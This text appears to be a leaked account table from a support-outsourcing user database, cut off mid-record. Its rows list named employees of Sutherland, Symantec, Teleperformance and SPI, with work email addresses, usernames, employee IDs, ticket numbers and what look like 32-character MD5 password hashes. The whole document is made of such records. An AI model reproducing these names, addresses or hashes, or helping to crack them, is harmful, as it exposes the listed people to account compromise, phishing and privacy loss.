5705-4a3e-93a9-715ec32fe0d7,tools_id@symantec.suth.com,SH 16/09/2010,tools_id@sy
mantec.suth.com,Sutherland,2ac81279f4a060f99c002a71ac179061,SaidineshB,<blank>,0
88997,Yadav,NULL,NULL,NULL
537-4b34-b0ac-0e4f18b6c024,<blank>,<blank>,Ranjitham_Daniel@suth.com,Sutherland,
9c2c192ca3170089ea95fb8c50e98d00,Daniel Royan,<blank>,Ranjitham_Daniel,Ranjitham
,NULL,NULL,NULL
9ec-4012-bd51-55aa442c1134,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,adaa183f2b2db339fd6a66eccb87086d,R,<blank>,RanjithKumar_R5,Ranjith Kumar,NULL,N
ULL,NULL
e3f-443c-ae97-47d47cb1e452,<blank>,<blank>,Raveenthran_AM@SUTH.COM,Sutherland,2b
76c2ed04dda03f125b8cd6f91833c1,A M,<blank>,Raveenthran_AM,Raveenthran,NULL,NULL,
NULL
cdb-4e89-b994-cbe9327f094e,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,0fd1bc567a5afdf61364a6f6111e30a2,C,<blank>,Ravishankar_C,Ravishankar,NULL,NULL,
NULL
83e-4d5b-90db-7430c0b41500,<blank>,<blank>,Nixon_Barretto@SUTH.COM,Sutherland,84
432f7bd13f32843edc179a3e412ab1,Barretto,<blank>,Nixon_Barretto,Nixon,NULL,NULL,N
ULL
cc6-4a01-98f8-4e8bb20ce972,<blank>,<blank>,Noel_Fernandes1@SUTH.COM,Sutherland,e
f3be2b09ffae5551ef3fd6ef6d65bb5,Fernandes,<blank>,Noel_Fernandes1,Noel,NULL,NULL
,NULL
08a-4789-bb95-040a630cea6d,<blank>,<blank>,ObaidurRahman_SH@SUTH.COM,Sutherland,
855a7e6119f13837bb90aa5546c594fd,S H,<blank>,ObaidurRahman_SH,Obaidur Rahman,NUL
L,NULL,NULL
471b-4179-852d-0fefb62ffc87,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6e430fdbd077a0f44e50e3ac1778a4c7,Bello,<blank>,096051,Honeylyn,NULL,NULL,NULL
1c9-4888-9b37-d2f0f2203c16,<blank>,<blank>,Praveen_Kocherry@SUTH.COM,Sutherland,
272ed177fca8c4e1e2ef2d97006d09e2,Kocherry,<blank>,Praveen_Kocherry,Praveen,NULL,
NULL,NULL
80c7-40b3-85de-edaf6b7cf260,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,s
utherland,2a181a1f4f314b25460ffb5b7050b320,Sapra,<blank>,074825,Amit,NULL,NULL,N
ULL
43c6-475c-95a6-027b4c94fa8a,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,6
d5777ba833d7c155b7f4c42a80ced40,Ahmed,<blank>,108868,SyedMatheen,NULL,NULL,NULL
49a-45c5-bf70-459b199c7053,<blank>,<blank>,RajeshKumar_PV@SUTH.COM,Sutherland,bd
0d2877c234cc4fca6caaf474027a71,P V,<blank>,RajeshKumar_PV,Rajesh Kumar,NULL,NULL
,NULL
620d-4626-8fbd-748387ac7952,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,1b846bf05536606385f4a784afd192f3,Swarez,<blank>,074171,Eugene,NULL,NU
LL,NULL
78f7-4ab0-9318-adf474fd3837,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,7
10c347ee037a6bb0b9a33662e480a1b,C,<blank>,108867,Sarabeshwar,NULL,NULL,NULL
595-4223-9600-a272afb73189,<blank>,<blank>,Ramyapriyatharsini_K@SUTH.COM,Sutherl
and,0d15816bc42414562a3179a77f60abc5,K,<blank>,Ramyapriyatharsini_K,Ramyapriyath
arsini,NULL,NULL,NULL
117-4472-bfea-7b5aef5e0f01,<blank>,090611/2633251,Tools_id@symantec.suth.com,Sym
antec,9196959128f2a1c9aeee4a5ff415485f,Khan,<blank>,mohdirshad_khan,MohdIrshad,N
ULL,NULL,NULL
e934-42b3-b390-8e70b45ae1fe,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,
7c128dbfa46dcb9fd30e87eabf6b2fd5,Kevin Kerwien,<blank>,comcast_agent,Comcast Age
nt Demo,NULL,NULL,NULL
9325-40e3-a272-b78284f209c5,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,7
dd4a47bd9dda8865fe4942bc1f6ea46,Laude Villas,<blank>,111117,Nino,NULL,NULL,NULL
0128-4637-a64f-06864b067508,<blank>,<blank>,euleste_chua@symantec.com,Symantec,8
51a7ae13fa4076d407220aec753a0a1,Chua,<blank>,euleste_chua,Euleste,NULL,NULL,NULL
968-4a3a-9757-9a7775be4c9d,<blank>,<blank>,Rekha_K2@SUTH.COM,Sutherland,43a05fa2
95ba8d6c262a3d7cc7752c4d,K,<blank>,Rekha_K2,Rekha,NULL,NULL,NULL
763-484f-833d-f7a1f04f6842,<blank>,<blank>,RemyaG_Krishnan@SUTH.COM,Sutherland,5
66a4064bd05dd51e93875f7ffdb5552,Krishnan,<blank>,RemyaG_Krishnan,Remya,NULL,NULL
,NULL
2470-42e1-ab59-e2661bbcb16b,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,ab3fde12244f823afc40aab22e7d2ad4,Billa,<blank>,074650,Abraham,NULL,NULL,N
ULL
9db-49bb-b7cb-b5b2e852d471,<blank>,<blank>,Parvathi_Arun@SUTH.COM,Sutherland,98a
87d18e7a89b54e7b8b0cf0680940d,Arun,<blank>,Parvathi_Arun,Parvathi,NULL,NULL,NULL
539-4321-9732-495b923965db,<blank>,<blank>,PaulJohn_Gabayan@SUTH.COM,Sutherland,
a0aec98e212bdbcb617dce1dd3c724f2,JohnGabayan,<blank>,PaulJohn_Gabayan,Paul,NULL,
NULL,NULL
fb46-419b-b376-f14d107908a1,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,3387f4fea1c8668401896aff45a751f8,Ayada,<blank>,075100,Dhexter,NULL,NU
LL,NULL
725-47d6-adf1-f2a6ab049516,<blank>,<blank>,Plmohan@Suth.Com,Sutherland,4c273d2db
bced8c9847278c39b769903,Narasimha Moorthy,<blank>,Plmohan,Leela Mohan,NULL,NULL,
NULL
d51-4a5b-96cb-3bdbc4dae014,<blank>,<blank>,Pratap_D@SUTH.COM,Sutherland,55e2a37b
84faa5e11b6b804f2c947565,D,<blank>,Pratap_D,Pratap,NULL,NULL,NULL
bc2-4224-a703-2105c41754a3,<blank>,<blank>,PratikDinesh_Fernandes@SUTH.COM,Suthe
rland,5b3eed615b032571ea05122b0b31ebc3,Fernandes,<blank>,PratikDinesh_Fernandes,
Pratik,NULL,NULL,NULL
20d-442d-bd6b-5e9ce6c2b526,<blank>,<blank>,Praveen_J@SUTH.COM,Sutherland,99679ba
1903a966e3ad6c2ea764590d1,J,<blank>,Praveen_J,Praveen,NULL,NULL,NULL
4a9b-4058-8ed5-2670636efacf,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,93758dec97bef294b20446c6d7f17d5d,Alageasan,<blank>,074532,Sathiyaraj,NULL
,NULL,NULL
e1d-42b2-915a-0e5157d030e0,<blank>,<blank>,Rizalito_Garcia@symantec.suth.com,Sut
herland,1fda87293a0568f7a82d692eda0f49a2,GonzalesGarcia,<blank>,Rizalito_Garcia,
Rizalito,NULL,NULL,NULL
324-441c-913d-2d2c6c219c2b,<blank>,<blank>,Rizwanullah_B@SUTH.COM,Sutherland,9eb
c867e2433e7fa482413adf2ff6d67,B,<blank>,Rizwanullah_B,Rizwanullah,NULL,NULL,NULL
91c-44de-8e2c-113685e81627,<blank>,<blank>,Roan_Arceo@SUTH.COM,Sutherland,06b34c
0c0f4c21561c1d566674c60f1d,Arceo,<blank>,Roan_Arceo,Roan,NULL,NULL,NULL
c335-4adf-89db-1dfa2cbad682,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,8b3df997fad8d1605e9c864f7632a6d5,Ramamurthy,<blank>,074533,Gowtham,NULL,N
ULL,NULL
3e20-443b-9e4e-f9a512dc77fd,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,fd6bc43ca9d4411ef58a9837e8607a86,R Doshi,<blank>,074611,Sneba,NULL,NULL,N
ULL
26f-493e-9152-60481f6bdf19,<blank>,<blank>,Rohitdeen_I@SUTH.COM,Sutherland,52125
bbfc88a779471a46d1aa0074cff,I,<blank>,Rohitdeen_I,Rohit deen,NULL,NULL,NULL
616-4cd5-abd8-667f6c04a268,<blank>,<blank>,Ronny_Patel@SUTH.COM,Sutherland,8831e
c762c9e7aef8c110ed636ba19bf,Patel,<blank>,Ronny_Patel,Ronny,NULL,NULL,NULL
975-4055-a95a-964469670998,<blank>,<blank>,RosePinky_Palo@Suth.com,Sutherland,20
131826927297e25cf8e9eba0817bb2,PinkyPalo,<blank>,RosePinky_Palo,Rose,NULL,NULL,N
ULL
3a08-4633-82d8-9beda76eea74,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,c69210ce62c2cadbe3b36f4a02afa08c,U,<blank>,074421,Udhaya Kumar,NULL,N
ULL,NULL
f73-4453-afba-3b38a243eaae,<blank>,<blank>,Prabhu_B@SUTH.COM,Sutherland,76dbeeb5
28b82b816e8f6e717f559d8c,Balasundram,<blank>,Prabhu_B,Prabhu,NULL,NULL,NULL
05df-4ec9-9e01-165ab33cc3a6,SRB 27.08.2010,INC000000251664,tools_id@symantec.sut
h.com,Sutherland,c35064bdca807fdd096af3bf63e3f6c5,Rayavarapu,<blank>,099918,Murt
hy Krishna,NULL,NULL,NULL
6d4-4c5c-a4f5-e695b573d205,<blank>,<blank>,Prabhu_Shankar@SUTH.COM,Sutherland,dd
e8448a67e3f4a5019fda7727d02962,Shankar,<blank>,Prabhu_Shankar,Prabhu,NULL,NULL,N
ULL
c4e8-497a-b389-f2fd6f8b8b14,CRQ000000486378 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,78b0b68415d4f06c90afa018b41017d2,Rajah,<blank>,12364
4,Harrisjordan,NULL,NULL,NULL
57c0-49fe-bb71-97c54489d181,PM - 1/6/2012 - CRQ000000491090,<blank>,surendar_kum
arp@SUTH.COM,Sutherland,fb4812488c6359684f42fc7c0a205995,KumarP,<blank>,107939,S
urendar,NULL,NULL,NULL
ea1b-4d61-8e95-f19b5bf87dbb,"CRQ000000830058 CLNP Oct 08,2012",000-0000,raphael_
guevarra@symantec.com,Symantec,39655c2a39943945ba2ca512b5e84e66,Guevarra,<blank>
,230606,Raphael,NULL,NULL,NULL
b17-4a9b-a3f5-4a6cc4e64608,<blank>,2518409/EMPROV,tools_id@symantec.suth.com,Sut
herland,eefab753fff5e16ab263419014f26628,Ramachandran,<blank>,086563,Midhun,NULL
,NULL,NULL
f50-43f3-bf0d-718e30df6306,SSS 17.05.10,INC000000173609,Tools_id@symantec.suth.c
om,"Sutherland Global Services, Inc.",3657acb4a7e7077e50ac3dbb611177d5,Jardin Ga
scon,<blank>,lejardin_gascon,Le,NULL,NULL,NULL
e92-4022-82a7-14353e6e5ea8,<blank>,<blank>,Rajit_Rangan@SUTH.COM,Sutherland,9fe2
3146f7fda5abeed020f7ff22e71e,Rangan,<blank>,Rajit_Rangan,Rajit,NULL,NULL,NULL
d89-4a19-a491-6e8b78e9f139,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,e76383313c8a92a545a81ec5d5254d3b,Tarwale,<blank>,Rajiv_Tarwale,Rajvin,NULL,NULL
,NULL
492-4266-9b21-00dcae4e7770,<blank>,<blank>,Raju_M@SUTH.COM,Sutherland,85f6908245
af64deed2fa37c24524a45,M,<blank>,Raju_M,Raju,NULL,NULL,NULL
fd62-4b9d-a8b2-7ec50d9b0b4a,CRQ000000671074--vmd--23/05/2012,<blank>,rommel_card
enas@suth.com,Sutherland,52af515fda224a4b7bb0da2f939dd63f,Cardenas,<blank>,22592
1,Rommel,NULL,NULL,NULL
28a-436c-beee-3e07755eb949,<blank>,<blank>,Rakesh_Varadkar@SUTH.COM,Sutherland,9
5a6b6435db052a39f5dc7457014d1fe,Varadkar,<blank>,Rakesh_Varadkar,Rakesh,NULL,NUL
L,NULL
cd3-4c84-817f-87ccf00c1102,<blank>,EMPROV,Suchit_Tripathy@symantec.com,Symantec,
41604942ff059e1bd3f9f3d7bb1a6a9d,Fathima,<blank>,092450,Amrin,NULL,NULL,NULL
d79-4b6d-9459-28de3aedb1b6,<blank>,<blank>,Renato_Avila@SUTH.COM,Sutherland,c6af
8b7a1e920c09d0808908824f1558,Avila,<blank>,Renato_Avila,Renato,NULL,NULL,NULL
af18-4e3d-8974-83cf4294109e,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,0
6ebf731823b666bb7391ca48bb7a1d2,Simbal,<blank>,110839,Alessa Atabelo,NULL,NULL,N
ULL
8203-416a-bef7-9ae6ab716796,CRQ000000690981--vmd--12/06/2012,<blank>,amattiessen
@symantec.teleperformance.gr,teleperformance,5db692e770da7818340d9a41f8f39f07,Ma
ttiessen,<blank>,226577,Alexandor,NULL,NULL,NULL
e4c9-43ad-9539-2dbbe3878741,"CRQ000000830064 CLNP Oct 08,2012",000-0000,raymond_
vencio@symantec.com,Symantec,b160765246bf5e9064e48b46e3004d39,Vencio,<blank>,230
610,Raymond,NULL,NULL,NULL
85b8-45dc-9d0c-e48cd78f2acd,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,f2b368982b69a7650fea384771a512a0,Bathija,<blank>,074852,Navin,NULL,NU
LL,NULL
34c-40f6-87d6-ea9ccd37988d,<blank>,<blank>,RovilynPerocillo_Montanez@SUTH.COM,Su
therland,e9cf8d62c77d826b4ea000dbea37557d,Monta\xf1ez,<blank>,RovilynPerocillo_M
ontanez,Rovilyn,NULL,NULL,NULL
bd8-4ff4-b6aa-3728ec09d125,<blank>,<blank>,RowelynRojas_Rodriguez@SUTH.COM,Suthe
rland,ef42c1bcc006a2fb34063ff9c55a6dad,RojasRodriguez,<blank>,RowelynRojas_Rodri
guez,Rowelyn,NULL,NULL,NULL
289-4615-bc54-80ae8c15ec6f,<blank>,2630245,Roxanne_Ladouceur@SUTH.COM,Sutherland
,732a65e04e3013918c40f6a6ff9bb808,Ladouceur,<blank>,Roxanne_Ladouceur,Roxanne,NU
LL,NULL,NULL
ad82-47e3-a171-51f06f9d954f,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,8151cc32df94c6f9c098aa5d939ed641,Mishra,<blank>,074746,Alok,NULL,NULL,NUL
L
d5d8-469c-a1d9-f34be61b9a61,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,d5ccbf94d0e1533df142c34b8b2bf1b2,Golandaz,<blank>,074878,Sajid,NULL,N
ULL,NULL
4ff-4ed0-8fb2-a6ea3f134b86,<blank>,<blank>,SachinShetty_BP@SUTH.COM,Sutherland,7
eec5b3de9463b3a8ec2b92addefbb87,Shetty,<blank>,SachinShetty_BP,Sachin,NULL,NULL,
NULL
f45-4e73-84d4-ed9b23a0fda8,<blank>,<blank>,Sahu_Nithin@SUTH.COM,Sutherland,9ea27
1b5a6b2e809ee085d3a1fb60eab,Sahu,<blank>,Sahu_Nithin,Nitin,NULL,NULL,NULL
bf8-4672-8826-3c81887f6b3d,<blank>,<blank>,Priyanka_Sharma@SUTH.COM,Sutherland,0
d9794f01857675122b7cb58a65bd07b,Sharma,<blank>,Priyanka_Sharma,Priyanka,NULL,NUL
L,NULL
cd2-4eb1-9c74-6548ac43809d,<blank>,<blank>,Rafeeque_Ashraf@SUTH.COM,Sutherland,1
a2340e95ac48ebc8623345c691142de,Ashraf,<blank>,Rafeeque_Ashraf,Rafeeque,NULL,NUL
L,NULL
31c-4dfa-86ca-1b828dbf511a,<blank>,091547,accounts@symantec.teleperformance.gr,T
eleperformance Greece,7cd135cfcdce34505eae2f414a0d413a,Petridis,<blank>,091547,P
etros,NULL,NULL,NULL
c2e4-4db8-9ba9-a11a7895a6d5,PM - 5/20/2011 - CRQ000000261271,<blank>,tools_id@sy
mantec.suth.com,<blank>,a582d818bf212b338d57f52b2e449872,Behura,<blank>,115833,B
iswajit,NULL,NULL,NULL
8fa-4496-bfab-110bb2ddb570,<blank>,<blank>,Rowina_Hay@SUTH.COM,Sutherland,be2851
ded4d36801fefe179b4a85cc7d,Hay,<blank>,Rowina_Hay,Rowina,NULL,NULL,NULL
250-4629-86ca-db7fa69f708c,<blank>,<blank>,Roxanne_Simon@symantec.suth.com,Suthe
rland,6c6c484f5ddbcff94f83e0c09de1143f,Simon,<blank>,Roxanne_Simon,Roxanne,NULL,
NULL,NULL
9183-4ec3-bc03-8078e7c42fde,<blank>,<blank>,vlagos@symantec.teleperformance.gr,C
T - 12/09/2012 - CRQ000000800593,2a69036075f6ddc6ec9aed4934c14843,Lagos,<blank>,
229967,Vasilios,NULL,NULL,NULL
890-43f4-afdb-55fcc8d2d218,<blank>,<blank>,Sakthi_Jagadeesan@SUTH.COM,Sutherland
,bfd7f3d9b3cd2d0e6471946ef7ebf25d,Jagadeesan,<blank>,Sakthi_Jagadeesan,Sakthi,NU
LL,NULL,NULL
21a5-4c05-8ba6-d17a7c342cc9,<blank>,<blank>,Eugene_Sacmar@SPI.COM,PM - 6/14/2012
- CRQ000000694605,740462a85d6ee948b86656ba2dd77aea,Sacmar,<blank>,226741,Eugene
,NULL,NULL,NULL
2a2f-4121-975e-6ee700ed028c,WS 22-07-2010,INC000000223553,Tools_Id@Symantec.Suth
.com,Sutherland,a4faa2973aad6fb65ab3b145b37d346d,JVK,<blank>,093919,Kumar,NULL,N
ULL,NULL
720-4876-935b-3953f2bf8e3c,<blank>,<blank>,Salmaan_Dalvi@SUTH.COM,Sutherland,c7f
b5ccafb8b9b5b6299841f62e56251,Dalvi,<blank>,Salmaan_Dalvi,Salmaan,NULL,NULL,NULL
32a-4a2c-a12f-fba7b5b4605a,<blank>,<blank>,Sam_Babu@SUTH.COM,Sutherland,8f419e9e
f63e5647a5744145dbaeca69,Babu,<blank>,Sam_Babu,Sam,NULL,NULL,NULL
bbdb-4177-aaf3-0f11b9b4c1c1,<blank>,<blank>,Jerome_Goli@SPI.COM,PM - 6/14/2012 -
CRQ000000694629,f6f96321004448a15d9e6b901e63e9b2,Goli,<blank>,226745,Jerome,NUL
L,NULL,NULL
a485-49c7-af3e-4a06445bd746,<blank>,<blank>,Johnel_Nunal@SPI.COM,PM - 6/14/2012
- CRQ000000694649,294d90fa0f4f9bf5eeb77e365c1bc84f,Nu\xf1al,<blank>,226748,Johne
l,NULL,NULL,NULL
f99-4469-8286-bc5b11a93d18,<blank>,<blank>,Sane_KP@SUTH.COM,Sutherland,a29ada5a1
a3ef9eece95a3997c18651a,K P,<blank>,Sane_KP,Sane,NULL,NULL,NULL
e74-4bba-bfb7-3865c70b7898,<blank>,<blank>,Sanjeev_Jacob@SUTH.COM,Sutherland,fa9
7e32da601593e849a4914f740b420,Jacob,<blank>,Sanjeev_Jacob,Sanjeev,NULL,NULL,NULL
54f-4189-9699-d33e56985ed3,<blank>,<blank>,Sanju_Soman@SUTH.COM,Sutherland,0302a
c1fee23077bc6a03238e230ec35,Soman,<blank>,Sanju_Soman,Sanju,NULL,NULL,NULL
16f-46e1-b79a-8fb4d60c1cae,<blank>,<blank>,SanthoshKumar_K@SUTH.COM,Sutherland,0
7affc4f93108c86e0cabec4557a5fcc,K,<blank>,SanthoshKumar_K,Santhosh Kumar,NULL,NU
LL,NULL
990-4881-9521-ab265ea7bfc4,<blank>,<blank>,Saravana_Arumugam@suth.com,Sutherland
,0846a91df348bb1aa96727862aeb1ffd,Arumugam,<blank>,Saravana_Arumugam,Saravanan,N
ULL,NULL,NULL
2836-4978-bb78-61eeba8a3f84,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,1c469e414f52a5c0c7b80405106c911d,KP,<blank>,089480,Kalasagar,NULL,NULL,NULL
7e9c-4313-9a3d-c7732c35b3c9,sms 01.10,INC182175,tools_id@symantec.suth.com,Suthe
rland,90e71701d5c7c63f30737eb83eac7b9c,Soni,<blank>,088286,Sunil,NULL,NULL,NULL
b148-44b5-acd0-866dda6d30dc,CRQ000000718023--vmd--03/07/2012,<blank>,guna_sekara
n@suth.com,sutherland,4c162bd546050b1f84d62faec25873aa,Sekaran,<blank>,227384,Gu
na,NULL,NULL,NULL
bf85-48e9-9f0a-f03cd765a384,CRQ000000718026--vmd--03/07/2012,<blank>,gnanavel_si
va@suth.com,sutherland,32824133401809089a5e908a85eacf5b,Siva,<blank>,227385,Gnan
avel,NULL,NULL,NULL
1db7-44d1-bc23-6f1ae0b75baa,CRQ000000718032--vmd--03/07/2012,<blank>,soutrickroy
_chouwdh@suth.com,sutherland,85b870160802439ac216a3b7add708a0,Chouwdhury,<blank>
,227390,Soutrick Roy,NULL,NULL,NULL
1f66-4e70-8a92-075a0224a915,CRQ000000208628,<blank>,tools_id@symantec.suth.com,S
p-25.2.11,956206ab2c1d6a2bab6f39420dbc28d2,M,<blank>,113348,Arun,NULL,NULL,NULL
b7a-465e-a03d-326712078e66,<blank>,<blank>,SatishReddy_M@SUTH.COM,Sutherland,28b
d9473c5293f64d17f7ae5fea9e2f6,Madhaya Reddy,<blank>,SatishReddy_M,Satish Reddy,N
ULL,NULL,NULL
09c-429f-a7e9-f4e01b51265e,<blank>,<blank>,SazedAli_V@SUTH.COM,Sutherland,d050b5
fa4657ad42d85cfa377926bff6,V,<blank>,SazedAli_V,Sazed Ali,NULL,NULL,NULL
7d39-432a-b264-2d225404d1b5,PM - 1/6/2012 - CRQ000000491090,<blank>,subratswain_
subrat@SUTH.COM,Sutherland,a0f31a76fbde4fb25715dcf5f1ff3968,Swain,<blank>,115776
,Subrat,NULL,NULL,NULL
056-4e72-ba0b-103cf55ec55a,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,10a1576eae6aa3f17a68831f265492c1,R,<blank>,Rajesh_R6,Rajesh,NULL,NULL,NULL
faa-40b2-a0a3-ec0664ca7b7c,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,043fe8d854dc3c69e8bdfc1628328325,Jayamani,<blank>,RajeshKumar_J,Rajesh Kumar,NU
LL,NULL,NULL
1d25-4dba-87ee-50a1618807d5,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,0
8a81ab7f71d0e5c26a90f14b1ae1f89,KP,<blank>,110854,Premjith,NULL,NULL,NULL
ff31-477e-9957-b8c1a80375f7,CRQ000000496573--vmd--10/01/2012,000-000,ana.maria.r
odriguesdecampos@teleperformance.com.ar,Teleperformance,0ad4b84f39ec212c783e6a37
3b03eb31,Rodrigues De Campos,<blank>,123820,Ana Mana,NULL,NULL,NULL
9361-42c7-8447-499ee84ee4ab,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,d
b3bb970edbddee4ccccba6177457122,Daniel,<blank>,110855,Rino Kurien,NULL,NULL,NULL
f38-4e46-aa8b-1378e1c4885d,<blank>,<blank>,Rohan_Nishar@SUTH.COM,Sutherland,84d8
695b59e2d382f7d9a3075fb7a901,Nishar,<blank>,Rohan_Nishar,Rohan,NULL,NULL,NULL
be15-451d-8dcf-b7a8d514d2ed,<blank>,<blank>,Diegomichellie_Reyes@SPI.COM,PM - 6/
14/2012 - CRQ000000694594,d134d9674d16e1b26b4266c72580e44f,Reyes,<blank>,226739,
Diego Michellie,NULL,NULL,NULL
1653-4908-88d3-8b066b669c87,CRQ000000721270--vmd--05/07/2012,<blank>,rahul_verma
1@suth.com,sutherland,dd84b911b6afcc6092e3fb2930f0bbfa,Verma,<blank>,227363,Rahu
l,NULL,NULL,NULL
af4-407e-84dd-3ddae10d0085,<blank>,<blank>,SamuelJohn_Uy@SUTH.COM,Sutherland,2ef
f6d63cd6d6771835f86d441f5536d,JohnUy,<blank>,SamuelJohn_Uy,Samuel,NULL,NULL,NULL
0529-4417-a73b-fdae818dfc62,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496521,7f8fdaf7385f3e46b1e1dd1c0e91f2c5,Sonza,<blank>,12385
3,LeonelMae,NULL,NULL,NULL
aafe-44b2-b83b-1e8a59585a6c,<blank>,<blank>,Vijayaraghavan_G@symantec.com,Symant
ec,c84e594eb62ecae1e9d6aa6a74db514b,G,<blank>,111534,Vijayaraghavan,NULL,NULL,NU
LL
dc2-4e82-92d7-aa173f391877,<blank>,2633251,tools_id@symantec.suth.com,Sutherland
,6483d8cacb83e48653b2e7bcf8874c5b,Kamble,<blank>,SantoshVasant_Kamble,Santosh,NU
LL,NULL,NULL
f05-4a33-9f52-c941ae01959f,<blank>,<blank>,Scott_Lang@suth.com,Sutherland,174b8f
36a84e75ffdd4a0ddaafede8f4,Lang,<blank>,Scott_Lang,Scott,NULL,NULL,NULL
d1f-4c57-82db-925ee8c23ed7,<blank>,<blank>,Sejas_Mehta@SUTH.COM,Sutherland,b464a
801245356ac726e018a5663d86c,Mehta,<blank>,Sejas_Mehta,Sejas,NULL,NULL,NULL
dca-4fca-96b7-95bbd7599668,<blank>,<blank>,Selvaraj_AL@SUTH.COM,Sutherland,ae4db
cd4115a30295543ec24a7a219c4,A L,<blank>,Selvaraj_AL,Selvaraj,NULL,NULL,NULL
efd7-4566-ba16-5389f34f2ec4,"CRQ000000497731-RJ-Jan 11, 2012",<blank>,Vipin_Bala
krishnan@symantec.com,Symantec,b3cfe48d4c28915e9a42f5cf388f8a11,Balakrishnan,<bl
ank>,122959,Vipin,NULL,NULL,NULL
7c9-4eb9-96d3-f5b5792f81e7,<blank>,<blank>,SenthilKumar_M7@SUTH.COM,Sutherland,7
eabdacf644034cbfb265e20ba403ff8,M,<blank>,SenthilKumar_M7,Senthil Kumar,NULL,NUL
L,NULL
c21-4f92-ba91-e5b20e15ba11,<blank>,<blank>,SenthilKumar_S5@SUTH.COM,Sutherland,0
199025f91f30e626ba9a17136c3aaea,S,<blank>,SenthilKumar_S5,Senthil Kumar,NULL,NUL
L,NULL
980-4979-8d9f-0cb1899d506d,<blank>,<blank>,SenthilKumar_VP@SUTH.COM,Sutherland,1
de21a5489d87c375f3a0121ae2c9d33,V P,<blank>,SenthilKumar_VP,Senthil Kumar,NULL,N
ULL,NULL
9d8-4803-bb6e-6724ace2fd65,<blank>,<blank>,Shabaz_Sayed@SUTH.COM,Sutherland,c583
8edf53df66ec7e58c15d002eefd9,Sayed,<blank>,Shabaz_Sayed,Shabaz,NULL,NULL,NULL
437f-4125-b5ae-394b5888372d,11/05/2010 - SPJ,EMPROV,Tools_ID@symantec.Suth.com,S
utherland,2ae17ea9f6987b7e58892881bd2c23f2,Varghese,<blank>,105058,Bibin,NULL,NU
LL,NULL
f6a-4160-9a54-ef117b7d7979,<blank>,<blank>,ShaikAkbar_Ali@SUTH.COM,Sutherland,1d
3cee9f46d47d9230ed87a17efc32c9,Ali,<blank>,ShaikAkbar_Ali,Shaik Akbar,NULL,NULL,
NULL
fea-4724-89b3-e09e9b103777,<blank>,<blank>,Shailesh_Bhatia@SUTH.COM,Sutherland,0
381d2f100de7b1c86dd896020c0eb8b,Bhatia,<blank>,Shailesh_Bhatia,Shailesh,NULL,NUL
L,NULL
8040-4e1a-abfa-4e53e353afbd,<blank>,<blank>,edilberto_johnson@suth.com,CT - 28/0
6/2012 - CRQ000000711567,c5445aaeb45a5eb25eb86698fa6119e4,Johnson,<blank>,226989
,Edilberto,NULL,NULL,NULL
106a-444b-bfd8-c4402f74fd34,11/01/2010 - SPJ,EMPROV,karinne_brannigan@Symantec.c
om,Symantec.,39f7f5b2c7ddaadc8457cee5c9e248f2,Cowan,<blank>,093042,Emily ,NULL,N
ULL,NULL
ddb-4569-b198-5acb6fe1e3d9,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,6e38b50e2eaedd88d5c48f8d1b6b9e71,Shanmugam,<blank>,Renuka_Shanmugam,Renuka,NULL
,NULL,NULL
8b6-4b84-b66b-9457ae1b3aef,<blank>,<blank>,Rheal_Jefferies@suth.com,Sutherland,1
d2f5f392d1caf6881361ffac75e9c3b,Jefferies,<blank>,Rheal_Jefferies,Rheal,NULL,NUL
L,NULL
f3c-4b1d-8a94-90f979aba899,<blank>,2630245,v-6ride@mssupport.microsoft.com,Suthe
rland,56500dc7e70bed773c2e77385faaa089,R Derasp,<blank>,richard_derasp,Richard,N
ULL,NULL,NULL
b37-4806-8a8d-241f5c6b502f,<blank>,<blank>,0@Suth.com,Sutherland,0bc45b73bf0dc37
5c28bfa5d5952336a,Sison,<blank>,richard_sison,Richard,NULL,NULL,NULL
d6f0-4277-940b-c04d6a2b9b28,<blank>,<blank>,reydentor_maniacup@suth.com,CT - 28/
06/2012 - CRQ000000711690,4184d3c7c95d6e11a0c7e871071d6e87,Maniacup,<blank>,2270
01,Reydentor,NULL,NULL,NULL
1b5-4f33-8631-cd3ecfcc054e,<blank>,<blank>,Ricky_Selarka@SUTH.COM,Sutherland,9a6
7d8e92dee1c99b3600288948155b3,Selarka,<blank>,Ricky_Selarka,Ricky,NULL,NULL,NULL
17a7-4120-923f-8295cab64aa4,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496435,8d2474e874f5ff4804451887c6aeddbf,Asumbrado,<blank>,1
23841,AileenMae,NULL,NULL,NULL
0ed-41cd-a642-7cbad4a0aeb0,<blank>,<blank>,Riyaz_Khaja@suth.com,Sutherland,80f55
b243f4ba3bc6ad488a9a0f95257,Khaja,<blank>,Riyaz_Khaja,Riyaz,NULL,NULL,NULL
ae58-4210-aa8f-38eacc457a62,<blank>,000-0000,prasanna_cln@symantec.com,Symantec,
b520eec98bb4ac1ee9117cfa11d84634,Cln,<blank>,117251,Prasanna,NULL,NULL,NULL
4ed-4e46-8a06-bb9bd14e7b78,<blank>,86849/2614952,Tools_id@symantec.suth.com,"Sut
